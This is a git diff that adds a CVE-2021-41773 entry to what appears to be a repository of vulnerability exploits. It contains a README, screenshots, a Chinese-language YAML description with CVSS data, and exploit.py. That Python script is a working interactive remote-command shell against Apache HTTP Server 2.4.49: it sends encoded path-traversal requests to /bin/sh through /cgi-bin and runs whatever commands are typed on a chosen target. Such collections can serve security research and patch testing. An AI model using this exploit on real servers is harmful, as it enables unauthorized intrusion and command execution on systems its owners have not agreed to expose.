diff --git a/cve/apache/2021/CVE-2021-41773/README.md b/cve/apache/2021/CVE-2021-41773/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..475e03c907fb387a44ed0ce2949fe70196166637
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-41773/README.md
@@ -0,0 +1,19 @@
+# CVE-2021-41773
+
+> Apache2 2.4.49 - LFI & RCE Exploit
+
+## Info
+
+```bash
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Exploit Author: Gaurav Raj https://gauravraj.xyz https://blog.gauravraj.xyz
+# Vendor Homepage:  https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+```
+
+## Screenshots
+
+<img src="./screenshots/Pasted image 20220313024756.png" width="60%">
+<img src="./screenshots/Pasted image 20220313024903.png" width="60%">
diff --git a/cve/apache/2021/CVE-2021-41773/exploit.py b/cve/apache/2021/CVE-2021-41773/exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..8881dc23bffc9a6405a43645a87dab6f95c87ac7
--- /dev/null
+++ b/cve/apache/2021/CVE-2021-41773/exploit.py
@@ -0,0 +1,59 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Exploit Author: Gaurav Raj https://gauravraj.xyz
+# Vendor Homepage:  https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+
+
+#!/usr/bin/python3
+
+import argparse
+import requests
+
+
+def runcmd(target):
+    url = 'http://{}'.format(target)
+    req = requests.get(url)
+    while True:
+        cmd = input("\033[1;36m>>> \033[0m")
+        if (cmd != 'exit'):
+            if ('https' not in req.url):
+                url = "http://{}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh".format(
+                    target)
+            else:
+                url = "https://{}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh".format(
+                    target)
+            data = "echo Content-Type: text/plain; echo; {}".format(cmd)
+            session = requests.Session()
+            req = requests.Request(
+                method='POST', url=url, data=data).prepare()
+            req.url = url
+            print(session.send(req).text, end='')
+
+        else:
+            exit(0)
+
+
+def banner():
+    print('''--------------------------------------------------------
+|                \033[1;32mApache2 2.4.49\033[1;37m - \033[1;31mExploit\033[0m              |
+--------------------------------------------------------''')
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Apache2 2.4.49 Exploit")
+    parser.add_argument(
+        '-t', '--target', help='Specify the target IP or Domain. eg: 127.0.0.1 or example.com', required=True)
+    arg = parser.parse_args()
+    banner()
+    try:
+        runcmd(arg.target)
+    except KeyboardInterrupt:
+        exit(1)
+    except EOFError:
+        exit(1)
+
+
+if __name__ == '__main__':
+    main()
diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png b/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png
new file mode 100644
index 0000000000000000000000000000000000000000..ffb6b632ba84fa641ceb8c471cae4d3ee1637155
Binary files /dev/null and b/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png differ
diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png b/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png
new file mode 100644
index 0000000000000000000000000000000000000000..148a0748b7f26f105223cd8565a119261f51db92
Binary files /dev/null and b/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png differ
diff --git a/cve/apache/2021/yaml/KVE-2022-0206.yaml b/cve/apache/2021/yaml/KVE-2022-0206.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..48a8205edb0b8d7dc92a9657083587c436d2dbbe
--- /dev/null
+++ b/cve/apache/2021/yaml/KVE-2022-0206.yaml
@@ -0,0 +1,20 @@
+id: CVE-2021-41773
+source: https://github.com/thehackersbrain/CVE-2021-41773
+info:
+  name: Apache HTTP Server（简称 Apache）是开源的 Web 服务器，可以在大多数计算机操作系统中运行，由于其多平台和安全性被广泛使用，是最流行的 Web 服务器端软件之一。它快速、可靠并且可通过简单的 API 扩展，将 Perl/Python 等解释器编译到服务器中。
+  severity: high
+  description: |
+    Apache 披露了一个在 Apache HTTP Server 2.4.49 上引入的漏洞，称为 CVE-2021-41773。同时发布了2.4.50更新，修复了这个漏洞。该漏洞允许攻击者绕过路径遍历保护，使用编码并读取网络服务器文件系统上的任意文件。运行此版本 Apache 的 Linux 和 Windows 服务器都受到影响。此漏洞是在 2.4.49 中引入的，该补丁旨在提高 URL 验证的性能。可以通过对“.”进行编码来绕过新的验证方法。如果 Apache 网络服务器配置未设置为“要求全部拒绝”，则漏洞利用相对简单。通过对这些字符进行编码并使用有效负载修改 URL，可以实现经典的路径遍历。
+  scope-of-influence:
+    Apache HTTP = 2.4.49
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
+    - https://httpd.apache.org/security/vulnerabilities_24.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-41773
+    cwe-id: CWE-22
+    cnvd-id: None
+    kve-id: None
+  tags: cve2021,Apache,目录遍历
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index 52deae23bd4cbaf224d3b7294bcf6fd17806680d..fda618d64e897264be9f2a4adb7a959084404865 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -2,6 +2,7 @@
 cve: 
   apache:
     - CVE-2020-9490
+    - CVE-2021-41773
   linux-kernel:
     - CVE-2021-22555
     - CVE-2022-34918